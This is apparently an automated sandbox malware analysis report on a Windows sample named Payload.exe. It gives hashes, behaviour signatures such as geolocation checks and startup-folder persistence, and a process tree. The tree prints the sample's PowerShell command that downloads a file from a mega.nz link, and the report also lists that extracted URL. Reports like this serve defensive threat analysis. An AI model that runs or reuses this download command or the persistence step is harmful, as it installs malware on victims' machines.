Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2023 22:37
Behavioral task
behavioral1
Sample
Payload.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Payload.exe
Resource
win10v2004-20230220-en
General
-
Target
Payload.exe
-
Size
27KB
-
MD5
b4dad0a0467d3a0c9621ca1c7794c707
-
SHA1
61800bf88b4878d44f7accc79860c4aee482e5cb
-
SHA256
7c2a477d02ba0822602b27a761edf1a8370d595e487fa0351e42d0765844561e
-
SHA512
6d2880136ff05b51025cc345daf1f1b23ec5d04a0b7809b306dfd93fab4664335b832b6f4060db44b59a3c410213d4da133d56aaf588f22bd164187a7a9f1a65
-
SSDEEP
384:vLbmd21qBNOaLNOF0TEdQIeCP1BBvMl7AQk93vmhm7UMKmIEecKdbXTzm9bVhca/:Dyd2u0cqKl7A/vMHTi9bD
Malware Config
Extracted
https://mega.nz/file/CmZVzTzA#zNDfRZPSgAbtlolk0MfG2yD_ABN4riwqzWuFsRS5XqI
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Payload.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Payload.exe -
Drops startup file 1 IoCs
Processes:
Payload.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk Payload.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Payload.exepid process 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe 1120 Payload.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
Processes:
Payload.exepowershell.exedescription pid process Token: SeDebugPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: SeDebugPrivilege 2336 powershell.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe Token: 33 1120 Payload.exe Token: SeIncBasePriorityPrivilege 1120 Payload.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
Payload.execmd.exedescription pid process target process PID 1120 wrote to memory of 2704 1120 Payload.exe cmd.exe PID 1120 wrote to memory of 2704 1120 Payload.exe cmd.exe PID 1120 wrote to memory of 2704 1120 Payload.exe cmd.exe PID 2704 wrote to memory of 2336 2704 cmd.exe powershell.exe PID 2704 wrote to memory of 2336 2704 cmd.exe powershell.exe PID 2704 wrote to memory of 2336 2704 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Payload.exe"C:\Users\Admin\AppData\Local\Temp\Payload.exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\URL.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://mega.nz/file/CmZVzTzA#zNDfRZPSgAbtlolk0MfG2yD_ABN4riwqzWuFsRS5XqI','C:\ProgramData\https://mega.nz/file/CmZVzTzA#zNDfRZPSgAbtlolk0MfG2yD_ABN4riwqzWuFsRS5XqI');3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\URL.batFilesize
342B
MD5ba24d1a1e004ff429e414026ade4dc4b
SHA1098d72b925cfa75ffea85433a79329fdcdc1d3db
SHA2561dec770f0da84ea92ec65a17b540d625a041223bbf918142e03f4ad060e93b8b
SHA5129a0f209e8b3c70b4f38e19d20c160f6f4df20456e6c6a0101d873d2177693124fe0901d21ff5e2bcef654d06299d80bb92068e6c174d3f738112528c27c44eb2
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aokaftjh.pgm.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1120-133-0x0000000001CF0000-0x0000000001D00000-memory.dmpFilesize
64KB
-
memory/1120-136-0x0000000001CF0000-0x0000000001D00000-memory.dmpFilesize
64KB
-
memory/1120-166-0x0000000001CF0000-0x0000000001D00000-memory.dmpFilesize
64KB
-
memory/1120-165-0x0000000001CF0000-0x0000000001D00000-memory.dmpFilesize
64KB
-
memory/2336-146-0x0000000005450000-0x00000000054B6000-memory.dmpFilesize
408KB
-
memory/2336-145-0x0000000004670000-0x0000000004680000-memory.dmpFilesize
64KB
-
memory/2336-143-0x0000000004C80000-0x0000000004CA2000-memory.dmpFilesize
136KB
-
memory/2336-147-0x00000000054C0000-0x0000000005526000-memory.dmpFilesize
408KB
-
memory/2336-144-0x0000000004670000-0x0000000004680000-memory.dmpFilesize
64KB
-
memory/2336-157-0x0000000005B30000-0x0000000005B4E000-memory.dmpFilesize
120KB
-
memory/2336-158-0x0000000007360000-0x00000000079DA000-memory.dmpFilesize
6.5MB
-
memory/2336-159-0x0000000006030000-0x000000000604A000-memory.dmpFilesize
104KB
-
memory/2336-142-0x0000000004CB0000-0x00000000052D8000-memory.dmpFilesize
6.2MB
-
memory/2336-141-0x0000000004580000-0x00000000045B6000-memory.dmpFilesize
216KB